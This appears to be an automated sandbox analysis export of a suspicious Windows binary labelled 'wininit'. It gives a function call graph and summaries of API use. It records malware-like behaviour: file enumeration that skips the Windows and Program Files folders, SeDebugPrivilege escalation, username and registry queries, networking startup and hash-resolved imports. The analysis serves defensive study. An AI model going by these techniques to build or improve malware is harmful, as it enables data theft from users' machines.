402b7c 2 API calls 8123->8124 8126 403fcf 8124->8126 8125 403ff4 8125->8076 8126->8125 8297 403b98 8126->8297 8129 403ff8 GetLastError 8130 402bab 2 API calls 8129->8130 8130->8125 8132 402bb4 GetProcessHeap HeapFree 8131->8132 8133 402bc6 8131->8133 8132->8133 8133->8079 8135 402b98 8134->8135 8135->8089 8137 403236 8136->8137 8139 4031f3 8136->8139 8147 4030a5 8137->8147 8139->8137 8141 403208 8139->8141 8140 403224 8142 403258 SHGetFolderPathW 8140->8142 8144 4031e5 4 API calls 8140->8144 8153 403263 8141->8153 8142->8092 8142->8093 8144->8142 8145 40320d 8145->8142 8146 4030a5 4 API calls 8145->8146 8146->8140 8159 402ca4 8147->8159 8149 4030b0 8150 4030b5 8149->8150 8163 4030c4 8149->8163 8150->8140 8154 40326d 8153->8154 8155 402b7c 2 API calls 8154->8155 8158 4032b7 8154->8158 8156 40328c 8155->8156 8157 402b7c 2 API calls 8156->8157 8157->8158 8158->8145 8160 403079 8159->8160 8161 40307c 8160->8161 8167 40317b GetPEB 8160->8167 8161->8149 8164 4030eb 8163->8164 8165 4030c0 8164->8165 8169 402c03 8164->8169 8165->8140 8168 40319b 8167->8168 8168->8161 8170 4031e5 3 API calls 8169->8170 8171 402c15 GetProcAddress 8170->8171 8171->8165 8173 4031e5 4 API calls 8172->8173 8174 4059cb 8173->8174 8174->8100 8193 405797 8175->8193 8177 405792 8177->8112 8179 4057eb 8178->8179 8192 405832 8178->8192 8179->8192 8203 4040bb 8179->8203 8182 405839 8184 405853 8182->8184 8230 405627 8182->8230 8183 40582c 8227 403f9e 8183->8227 8241 405762 8184->8241 8191 403f9e 5 API calls 8191->8192 8192->8116 8192->8117 8194 4057a1 8193->8194 8196 4057bd 8193->8196 8194->8196 8197 4056fc 8194->8197 8196->8177 8198 405714 8197->8198 8199 402b7c 2 API calls 8198->8199 8201 405730 8199->8201 8200 405752 8200->8196 8201->8200 8202 402bab 2 API calls 8201->8202 8202->8200 8204 4031e5 4 API calls 8203->8204 8205 4040d5 CreateFileW 8204->8205 8206 4040f8 8205->8206 8207 40418d 8205->8207 8209 4031e5 4 API calls 8206->8209 8208 404183 8207->8208 8247 403c90 8207->8247 8208->8182 8208->8183 8208->8192 8214 404105 8209->8214 8212 40416d 8244 403c40 8212->8244 8214->8212 8218 4031e5 4 API calls 8214->8218 8217 402bab 2 API calls 8217->8208 8220 404131 VirtualAlloc 8218->8220 8219 4040bb 10 API calls 8221 4041c8 8219->8221 8220->8212 8222 404142 8220->8222 8221->8217 8223 4031e5 4 API calls 8222->8223 8224 40414f ReadFile 8223->8224 8224->8212 8225 404160 8224->8225 8226 4031e5 4 API calls 8225->8226 8226->8212 8228 4031e5 4 API calls 8227->8228 8229 403fb1 VirtualFree 8228->8229 8229->8192 8231 4031e5 4 API calls 8230->8231 8232 40563a 8231->8232 8233 405872 8232->8233 8235 405881 8233->8235 8234 4058bc 8237 405797 4 API calls 8234->8237 8239 4058af 8234->8239 8235->8234 8294 4058d4 8235->8294 8237->8239 8239->8184 8240 405781 4 API calls 8240->8234 8242 405781 4 API calls 8241->8242 8243 405770 8242->8243 8243->8191 8245 4031e5 4 API calls 8244->8245 8246 403c52 CloseHandle 8245->8246 8246->8208 8248 403ca3 8247->8248 8251 403caa 8247->8251 8274 405dc5 8248->8274 8250 404056 7 API calls 8252 403cbe 8250->8252 8251->8250 8253 403d3a 8251->8253 8254 403d2e 8252->8254 8255 403d17 8252->8255 8256 403ccf 8252->8256 8253->8208 8270 403c59 8253->8270 8254->8253 8257 402bab 2 API calls 8254->8257 8258 405b6f 6 API calls 8255->8258 8259 405b6f 6 API calls 8256->8259 8257->8253 8260 403d14 8258->8260 8261 403cdd 8259->8261 8264 402bab 2 API calls 8260->8264 8262 405b6f 6 API calls 8261->8262 8263 403cee 8262->8263 8263->8260 8279 403d4d 8263->8279 8264->8254 8267 403d0b 8269 402bab 2 API calls 8267->8269 8269->8260 8271 403c21 8270->8271 8272 4031e5 4 API calls 8271->8272 8273 403c33 8272->8273 8273->8219 8273->8221 8288 406799 8274->8288 8276 405dd5 8277 402b7c 2 API calls 8276->8277 8278 405dfe 8277->8278 8278->8251 8291 403bb7 8279->8291 8281 403cfe 8281->8267 8282 403c62 8281->8282 8283 403d4d 5 API calls 8282->8283 8284 403c6d 8283->8284 8285 403c72 8284->8285 8286 4031e5 4 API calls 8284->8286 8285->8267 8287 403c87 CreateDirectoryW 8286->8287 8287->8267 8289 4031e5 4 API calls 8288->8289 8290 4067ad 8289->8290 8290->8276 8292 4031e5 4 API calls 8291->8292 8293 403bc9 GetFileAttributesW 8292->8293 8293->8281 8295 405797 4 API calls 8294->8295 8296 4058a8 8295->8296 8296->8239 8296->8240 8298 4031e5 4 API calls 8297->8298 8299 403baa 8298->8299 8299->8125 8299->8129 9688 40ebc6 9689 4040bb 13 API calls 9688->9689 9690 40ebdf 9689->9690 9696 40ecd7 9690->9696 9708 407795 9690->9708 9693 40eccd 9694 403f9e 5 API calls 9693->9694 9694->9696 9695 4056bf 2 API calls 9707 40ec12 9695->9707 9697 40ecb5 9698 402bab 2 API calls 9697->9698 9699 40ecbd 9698->9699 9700 413aca 4 API calls 9699->9700 9702 40ecc7 9700->9702 9701 407908 GetProcessHeap RtlAllocateHeap 9701->9707 9703 405695 2 API calls 9702->9703 9703->9693 9705 402bab GetProcessHeap HeapFree 9705->9707 9706 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9706->9707 9707->9697 9707->9701 9707->9705 9707->9706 9719 412269 9707->9719 9709 4077ab 9708->9709 9715 4077b3 9709->9715 9726 405ae9 9709->9726 9711 4077e1 9712 407802 9711->9712 9713 4077f8 9711->9713 9711->9715 9716 402b7c 2 API calls 9712->9716 9714 402bab 2 API calls 9713->9714 9714->9715 9715->9693 9715->9695 9717 407811 9716->9717 9718 402bab 2 API calls 9717->9718 9718->9715 9742 40374e 9719->9742 9722 412299 9722->9707 9723 4037be 4 API calls 9724 412291 9723->9724 9725 402bab 2 API calls 9724->9725 9725->9722 9727 405af7 9726->9727 9728 402b7c 2 API calls 9727->9728 9729 405b03 9728->9729 9738 405b5a 9729->9738 9739 405998 9729->9739 9731 405b21 9732 405b61 9731->9732 9734 402b7c 2 API calls 9731->9734 9733 402bab 2 API calls 9732->9733 9733->9738 9735 405b39 9734->9735 9735->9732 9736 405b40 9735->9736 9737 402bab 2 API calls 9736->9737 9737->9738 9738->9711 9740 4031e5 4 API calls 9739->9740 9741 4059ab 9740->9741 9741->9731 9743 402b7c 2 API calls 9742->9743 9744 40375f 9743->9744 9745 4031e5 4 API calls 9744->9745 9748 4037a3 9744->9748 9746 40378f 9745->9746 9747 402bab 2 API calls 9746->9747 9746->9748 9747->9748 9748->9722 9748->9723 8897 410cd1 8902 412093 8897->8902 8900 412093 13 API calls 8901 410cff 8900->8901 8905 4120a5 8902->8905 8923 410cf1 8902->8923 8903 4120b3 8904 404056 7 API calls 8903->8904 8906 4120ba 8904->8906 8905->8903 8909 412100 8905->8909 8907 405b6f 6 API calls 8906->8907 8908 412152 8906->8908 8906->8923 8910 412125 8907->8910 8924 403d74 8908->8924 8912 403fbf 7 API calls 8909->8912 8909->8923 8910->8908 8915 412139 8910->8915 8916 41214d 8910->8916 8912->8906 8914 41218c 8919 402bab 2 API calls 8914->8919 8914->8923 8918 402bab 2 API calls 8915->8918 8920 402bab 2 API calls 8916->8920 8917 402bab 2 API calls 8917->8914 8921 41213e 8918->8921 8919->8923 8920->8908 8922 402bab 2 API calls 8921->8922 8922->8923 8923->8900 8925 403d87 8924->8925 8926 403ea3 8925->8926 8927 405b6f 6 API calls 8925->8927 8928 405b6f 6 API calls 8926->8928 8929 403da3 8927->8929 8930 403eb9 8928->8930 8929->8926 8931 4031e5 4 API calls 8929->8931 8932 4031e5 4 API calls 8930->8932 8939 403f6f 8930->8939 8933 403dbc FindFirstFileW 8931->8933 8934 403ed3 FindFirstFileW 8932->8934 8936 403dd1 8933->8936 8945 403e9c 8933->8945 8949 403ee8 8934->8949 8954 403f8d 8934->8954 8935 402bab 2 API calls 8935->8926 8938 4031e5 4 API calls 8936->8938 8946 405b6f 6 API calls 8936->8946 8953 403d74 7 API calls 8936->8953 8958 402bab 2 API calls 8936->8958 8959 403f63 8936->8959 8937 402bab 2 API calls 8937->8939 8940 403e84 FindNextFileW 8938->8940 8939->8914 8939->8917 8940->8936 8941 403e96 8940->8941 8963 403bef 8941->8963 8942 405b6f 6 API calls 8942->8949 8943 4031e5 4 API calls 8947 403f50 FindNextFileW 8943->8947 8945->8935 8946->8936 8948 403f87 8947->8948 8947->8949 8951 403bef 5 API calls 8948->8951 8949->8942 8949->8943 8950 403f75 8949->8950 8957 402bab 2 API calls 8949->8957 8952 402bab 2 API calls 8950->8952 8951->8954 8955 403f7b 8952->8955 8953->8936 8954->8937 8956 403bef 5 API calls 8955->8956 8956->8939 8957->8949 8958->8936 8960 402bab 2 API calls 8959->8960 8961 403f69 8960->8961 8962 403bef 5 API calls 8961->8962 8962->8939 8964 4031e5 4 API calls 8963->8964 8965 403c01 FindClose 8964->8965 8965->8945 9152 4049dc 9153 4031e5 4 API calls 9152->9153 9154 4049ef SHEnumKeyExW 9153->9154 9824 40cddd 9825 405b6f 6 API calls 9824->9825 9826 40cdee 9825->9826 9827 40ce06 9826->9827 9828 413a58 14 API calls 9826->9828 9830 405b6f 6 API calls 9827->9830 9835 40ce59 9827->9835 9829 40ce00 9828->9829 9831 402bab 2 API calls 9829->9831 9832 40ce1c 9830->9832 9831->9827 9833 403d74 11 API calls 9832->9833 9832->9835 9838 40ce52 9832->9838 9836 40ce45 9833->9836 9834 402bab 2 API calls 9834->9835 9837 402bab 2 API calls 9836->9837 9836->9838 9837->9838 9838->9834 9155 40ecde 9156 412093 13 API calls 9155->9156 9157 40ecfd 9156->9157 9158 412093 13 API calls 9157->9158 9159 40ed0d 9158->9159 9163 40e8df 9164 412093 13 API calls 9163->9164 9165 40e8f8 9164->9165 9166 412093 13 API calls 9165->9166 9167 40e908 9166->9167 9174 404b22 9167->9174 9169 40e91c 9172 40e936 9169->9172 9173 40e93d 9169->9173 9181 40e944 9169->9181 9171 402bab 2 API calls 9171->9173 9172->9171 9175 402b7c 2 API calls 9174->9175 9176 404b33 9175->9176 9179 404b66 9176->9179 9190 4049b3 9176->9190 9178 404b5f 9178->9179 9180 402bab 2 API calls 9178->9180 9179->9169 9180->9179 9182 4056bf 2 API calls 9181->9182 9183 40e952 9182->9183 9184 40e976 9183->9184 9185 4057df 14 API calls 9183->9185 9184->9172 9186 40e966 9185->9186 9187 413aca 4 API calls 9186->9187 9188 40e970 9187->9188 9189 405695 2 API calls 9188->9189 9189->9184 9191 4031e5 4 API calls 9190->9191 9192 4049c6 SHGetValueW 9191->9192 9192->9178 9193 4139de 9202 413855 9193->9202 9195 4139f1 9196 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9195->9196 9197 4139f7 9196->9197 9198 413866 66 API calls 9197->9198 9199 413a2d 9198->9199 9200 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9199->9200 9201 413a34 9200->9201 9203 4031e5 4 API calls 9202->9203 9204 413864 9203->9204 9204->9204 9844 4116e7 9845 4117ba 9844->9845 9846 4117f1 9845->9846 9847 405b6f 6 API calls 9845->9847 9848 4117d0 9847->9848 9848->9846 9849 404cbf 9 API calls 9848->9849 9850 4117eb 9849->9850 9851 402bab 2 API calls 9850->9851 9851->9846 9224 4094e7 9225 404b22 7 API calls 9224->9225 9226 4094fe 9225->9226 9227 409554 9226->9227 9228 405b6f 6 API calls 9226->9228 9229 409514 9228->9229 9230 40954d 9229->9230 9232 404b22 7 API calls 9229->9232 9231 402bab 2 API calls 9230->9231 9231->9227 9233 40952d 9232->9233 9235 409408 18 API calls 9233->9235 9238 409544 9233->9238 9234 402bab 2 API calls 9234->9230 9236 40953e 9235->9236 9237 402bab 2 API calls 9236->9237 9237->9238 9238->9234 9893 40d4ea 9894 404bee 7 API calls 9893->9894 9895 40d500 9894->9895 9896 404bee 7 API calls 9895->9896 9901 40d5a0 9895->9901 9897 40d529 9896->9897 9898 404bee 7 API calls 9897->9898 9899 40d537 9898->9899 9900 404bee 7 API calls 9899->9900 9902 40d546 9900->9902 9902->9901 9903 405872 4 API calls 9902->9903 9904 40d56d 9903->9904 9905 405872 4 API calls 9904->9905 9906 40d57c 9905->9906 9907 405872 4 API calls 9906->9907 9908 40d58e 9907->9908 9909 405872 4 API calls 9908->9909 9909->9901 9910 4058ea 9911 4031e5 4 API calls 9910->9911 9912 4058fd 9911->9912 9913 40a3ea 9914 40374e 6 API calls 9913->9914 9915 40a403 9914->9915 9916 4059d8 4 API calls 9915->9916 9919 40a419 9915->9919 9917 40a411 9916->9917 9918 402bab 2 API calls 9917->9918 9918->9919 9284 404df3 WSAStartup 9288 4091f6 9289 404b22 7 API calls 9288->9289 9290 40920b 9289->9290 9291 409222 9290->9291 9292 409408 18 API calls 9290->9292 9293 40921c 9292->9293 9294 402bab 2 API calls 9293->9294 9294->9291 9946 4117fe 9947 404c4e 6 API calls 9946->9947 9948 411888 9947->9948 9949 404c4e 6 API calls 9948->9949 9951 411925 9948->9951 9950 4118ab 9949->9950 9950->9951 9965 4119b3 9950->9965 9953 4118c5 9954 4119b3 4 API calls 9953->9954 9955 4118d0 9954->9955 9955->9951 9956 4056bf 2 API calls 9955->9956 9957 4118fd 9956->9957 9958 405872 4 API calls 9957->9958 9959 41190a 9958->9959 9960 405872 4 API calls 9959->9960 9961 411915 9960->9961 9962 413aca 4 API calls 9961->9962 9963 41191f 9962->9963 9964 405695 2 API calls 9963->9964 9964->9951 9966 4119c6 9965->9966 9967 4119bf 9965->9967 9968 4031e5 4 API calls 9966->9968 9967->9953 9968->9967 9298 40e880 9299 41219c 15 API calls 9298->9299 9300 40e88e 9299->9300 9301 41219c 15 API calls 9300->9301 9302 40e89c 9301->9302 10032 40e48a 10033 404bee 7 API calls 10032->10033 10035 40e4d0 10033->10035 10034 40e4f4 10035->10034 10036 405872 4 API calls 10035->10036 10036->10034 9399 410390 9400 404b22 7 API calls 9399->9400 9401 4103a5 9400->9401 9402 410409 9401->9402 9403 405b6f 6 API calls 9401->9403 9408 4103ba 9403->9408 9404 410402 9405 402bab 2 API calls 9404->9405 9405->9402 9406 4103fb 9407 402bab 2 API calls 9406->9407 9407->9404 9408->9404 9408->9406 9409 403d74 11 API calls 9408->9409 9410 4103ee 9409->9410 9410->9406 9411 402bab 2 API calls 9410->9411 9411->9406 10047 40ed96 10048 4040bb 13 API calls 10047->10048 10062 40edb0 10048->10062 10049 40ef90 10050 40ef87 10051 403f9e 5 API calls 10050->10051 10051->10049 10052 405ae9 6 API calls 10052->10062 10053 412269 6 API calls 10053->10062 10054 40ef61 10055 40ef6e 10054->10055 10056 402bab 2 API calls 10054->10056 10057 40ef7c 10055->10057 10058 402bab 2 API calls 10055->10058 10056->10055 10057->10050 10059 402bab 2 API calls 10057->10059 10058->10057 10059->10050 10060 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10060->10062 10061 402bab GetProcessHeap HeapFree 10061->10062 10062->10049 10062->10050 10062->10052 10062->10053 10062->10054 10062->10060 10062->10061 10063 40ef98 10064 404c4e 6 API calls 10063->10064 10065 40efb6 10064->10065 10077 40f02a 10065->10077 10078 40f054 10065->10078 10068 404bee 7 API calls 10069 40efda 10068->10069 10070 404bee 7 API calls 10069->10070 10071 40efe9 10070->10071 10072 405872 4 API calls 10071->10072 10071->10077 10073 40f008 10072->10073 10074 405872 4 API calls 10073->10074 10075 40f01a 10074->10075 10076 405872 4 API calls 10075->10076 10076->10077 10079 40f064 10078->10079 10080 402b7c 2 API calls 10079->10080 10082 40f072 10080->10082 10081 40efca 10081->10068 10082->10081 10084 405ecd 10082->10084 10085 4059b8 4 API calls 10084->10085 10086 405edf 10085->10086 10086->10082 9418 410c98 9419 41219c 15 API calls 9418->9419 9420 410ca8 9419->9420 9421 41219c 15 API calls 9420->9421 9422 410cb5 9421->9422 9423 412093 13 API calls 9422->9423 9424 410cc9 9423->9424 10156 41249c 10157 4056bf 2 API calls 10156->10157 10158 4124aa 10157->10158 10159 4057df 14 API calls 10158->10159 10164 4124ce 10158->10164 10160 4124be 10159->10160 10161 413aca 4 API calls 10160->10161 10162 4124c8 10161->10162 10163 405695 2 API calls 10162->10163 10163->10164 9428 40f49e 9429 40f4b6 14 API calls 9428->9429 9430 40f4a8 9429->9430 9431 40929e 9432 413b28 7 API calls 9431->9432 9433 4092a4 9432->9433 9434 405b6f 6 API calls 9433->9434 9435 4092af 9434->9435 9436 409408 18 API calls 9435->9436 9439 4092c5 9435->9439 9437 4092bf 9436->9437 9438 402bab 2 API calls 9437->9438 9438->9439 10265 407fa4 10266 407fb7 10265->10266 10267 402b7c 2 API calls 10266->10267 10268 407fee 10266->10268 10269 40800d 10267->10269 10269->10268 10270 4037be 4 API calls 10269->10270 10271 40803c 10270->10271 10272 402bab 2 API calls 10271->10272 10272->10268 9473 4090aa 9474 404b22 7 API calls 9473->9474 9475 4090c1 9474->9475 9476 4090d8 9475->9476 9477 409408 18 API calls 9475->9477 9478 404b22 7 API calls 9476->9478 9479 4090d2 9477->9479 9480 4090eb 9478->9480 9481 402bab 2 API calls 9479->9481 9482 408c4d 17 API calls 9480->9482 9485 409104 9480->9485 9481->9476 9483 4090fe 9482->9483 9484 402bab 2 API calls 9483->9484 9484->9485 9492 409cae 9507 404b79 9492->9507 9494 409cc5 9496 405b6f 6 API calls 9494->9496 9497 409d2f 9494->9497 9499 409d27 9494->9499 9495 402bab 2 API calls 9495->9497 9498 409cec 9496->9498 9498->9499 9500 404b79 7 API calls 9498->9500 9499->9495 9501 409d05 9500->9501 9502 409d1e 9501->9502 9503 408c4d 17 API calls 9501->9503 9504 402bab 2 API calls 9502->9504 9505 409d18 9503->9505 9504->9499 9506 402bab 2 API calls 9505->9506 9506->9502 9508 404b22 7 API calls 9507->9508 9509 404b8a 9508->9509 9509->9494 10316 411fb3 10317 405b6f 6 API calls 10316->10317 10319 412013 10317->10319 10318 412075 10319->10318 10334 41206a 10319->10334 10335 411a8d 10319->10335 10321 402bab 2 API calls 10321->10318 10323 4056bf 2 API calls 10324 41203d 10323->10324 10325 405872 4 API calls 10324->10325 10326 41204a 10325->10326 10327 413aca 4 API calls 10326->10327 10328 412054 10327->10328 10329 405695 2 API calls 10328->10329 10330 41205a 10329->10330 10331 413a58 14 API calls 10330->10331 10332 412064 10331->10332 10333 402bab 2 API calls 10332->10333 10333->10334 10334->10321 10336 402b7c 2 API calls 10335->10336 10337 411aa3 10336->10337 10345 411f05 10337->10345 10358 404ada 10337->10358 10340 404ada 4 API calls 10341 411cad 10340->10341 10342 411f0c 10341->10342 10344 411cc0 10341->10344 10343 402bab 2 API calls 10342->10343 10343->10345 10361 405eb6 10344->10361 10345->10323 10345->10334 10347 411d3c 10348 4031e5 4 API calls 10347->10348 10356 411d7b 10348->10356 10349 411ea6 10350 4031e5 4 API calls 10349->10350 10351 411eb5 10350->10351 10352 4031e5 4 API calls 10351->10352 10353 411ed6 10352->10353 10354 405eb6 4 API calls 10353->10354 10354->10345 10355 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10355->10356 10356->10349 10356->10355 10357 405eb6 4 API calls 10356->10357 10357->10356 10359 4031e5 4 API calls 10358->10359 10360 404afd 10359->10360 10360->10340 10362 405998 4 API calls 10361->10362 10363 405ec8 10362->10363 10363->10347 9539 40f6b8 9540 41219c 15 API calls 9539->9540 9541 40f6c7 9540->9541 9542 41219c 15 API calls 9541->9542 9543 40f6d5 9542->9543 9544 41219c 15 API calls 9543->9544 9545 40f6df 9544->9545 9564 40d6bd 9565 4056bf 2 API calls 9564->9565 9566 40d6c9 9565->9566 9577 404cbf 9566->9577 9569 404cbf 9 API calls 9570 40d6f4 9569->9570 9571 404cbf 9 API calls 9570->9571 9572 40d702 9571->9572 9573 413aca 4 API calls 9572->9573 9574 40d711 9573->9574 9575 405695 2 API calls 9574->9575 9576 40d71f 9575->9576 9578 402b7c 2 API calls 9577->9578 9579 404ccd 9578->9579 9580 404ddc 9579->9580 9581 404b8f 5 API calls 9579->9581 9580->9569 9582 404ce4 9581->9582 9583 404dd4 9582->9583 9584 402b7c 2 API calls 9582->9584 9585 402bab 2 API calls 9583->9585 9591 404d04 9584->9591 9585->9580 9586 404dcc 9587 404a39 5 API calls 9586->9587 9587->9583 9588 404dc6 9589 402bab 2 API calls 9588->9589 9589->9586 9590 402b7c 2 API calls 9590->9591 9591->9586 9591->9588 9591->9590 9592 404b8f 5 API calls 9591->9592 9593 402bab GetProcessHeap HeapFree 9591->9593 9594 404a39 5 API calls 9591->9594 9595 405b6f 6 API calls 9591->9595 9596 404cbf 9 API calls 9591->9596 9598 40d726 9591->9598 9592->9591 9593->9591 9594->9591 9595->9591 9596->9591 9614 404bee 9598->9614 9601 405872 4 API calls 9604 40d761 9601->9604 9602 404bee 7 API calls 9602->9604 9603 405872 4 API calls 9603->9604 9604->9602 9604->9603 9606 40d971 9604->9606 9607 405781 4 API calls 9606->9607 9611 40d9bb 9606->9611 9622 404ba7 9606->9622 9607->9606 9609 405781 4 API calls 9609->9611 9611->9609 9612 405872 4 API calls 9611->9612 9613 40db63 9611->9613 9625 404c4e 9611->9625 9632 4037be 9611->9632 9612->9611 9613->9591 9615 402b7c 2 API calls 9614->9615 9616 404bff 9615->9616 9617 4031e5 4 API calls 9616->9617 9619 404c3b 9616->9619 9618 404c28 SHQueryValueExW 9617->9618 9618->9619 9620 404c3f 9618->9620 9619->9601 9619->9613 9621 402bab 2 API calls 9620->9621 9621->9619 9623 4031e5 4 API calls 9622->9623 9624 404bca 9623->9624 9624->9606 9626 402b7c 2 API calls 9625->9626 9627 404c60 9626->9627 9628 404ca4 9627->9628 9629 4031e5 4 API calls 9627->9629 9628->9611 9630 404c8d 9629->9630 9630->9628 9631 402bab 2 API calls 9630->9631 9631->9628 9633 4031e5 4 API calls 9632->9633 9634 4037e2 9633->9634 9635 40382b 9634->9635 9636 402b7c 2 API calls 9634->9636 9635->9611 9637 403802 9636->9637 9638 403832 9637->9638 9640 403809 9637->9640 9639 4036a3 4 API calls 9638->9639 9639->9635 9641 4036a3 4 API calls 9640->9641 9641->9635 9642 40f0bf 9643 4056bf 2 API calls 9642->9643 9644 40f0c9 9643->9644 9645 40f115 9644->9645 9646 404cbf 9 API calls 9644->9646 9647 41219c 15 API calls 9645->9647 9648 40f0ed 9646->9648 9649 40f128 9647->9649 9650 404cbf 9 API calls 9648->9650 9651 40f0fb 9650->9651 9652 413aca 4 API calls 9651->9652 9653 40f10a 9652->9653 9654 405695 2 API calls 9653->9654 9654->9645

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 296 403d74-403d90 call 4067c4 299 403d96-403da9 call 405b6f 296->299 300 403ea9-403ec0 call 405b6f 296->300 305 403ea6-403ea8 299->305 306 403daf-403dcb call 4031e5 FindFirstFileW 299->306 307 403f95 300->307 308 403ec6-403ee2 call 4031e5 FindFirstFileW 300->308 305->300 314 403dd1-403dd8 306->314 315 403e9d-403ea4 call 402bab 306->315 311 403f97-403f9d 307->311 316 403ee8-403ef8 call 405d24 308->316 317 403f8e-403f94 call 402bab 308->317 319 403e75-403e90 call 4031e5 FindNextFileW 314->319 320 403dde-403de2 314->320 315->305 332 403f03-403f0a 316->332 333 403efa-403f01 316->333 317->307 319->314 338 403e96-403e97 call 403bef 319->338 324 403e12-403e22 call 405d24 320->324 325 403de4-403df9 call 405eff 320->325 341 403e30-403e4c call 405b6f 324->341 342 403e24-403e2e 324->342 325->319 344 403dfb-403e10 call 405eff 325->344 334 403f12-403f2d call 405b6f 332->334 335 403f0c-403f10 332->335 333->332 339 403f41-403f5c call 4031e5 FindNextFileW 333->339 334->339 351 403f2f-403f33 334->351 335->334 335->339 346 403e9c 338->346 353 403f87-403f88 call 403bef 339->353 354 403f5e-403f61 339->354 341->319 358 403e4e-403e6f call 403d74 call 402bab 341->358 342->319 342->341 344->319 344->324 346->315 356 403f75-403f85 call 402bab call 403bef 351->356 357 403f35-403f40 call 402bab 351->357 362 403f8d 353->362 354->316 356->311 357->339 358->319 372 403f63-403f73 call 402bab call 403bef 358->372 362->317 372->311
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFind$FirstNext
                                                      • String ID: %s\%s$%s\*$Program Files$Windows
                                                      • API String ID: 1690352074-2009209621
                                                      • Opcode ID: 40569ec27d2ed31b417640aba95bc215c8784f98b68723b6d904a84cd13a4eb5
                                                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                      • Opcode Fuzzy Hash: 40569ec27d2ed31b417640aba95bc215c8784f98b68723b6d904a84cd13a4eb5
                                                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 3615134276-2896544425
                                                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_400000_wininit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                      • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                                      • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                                      • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
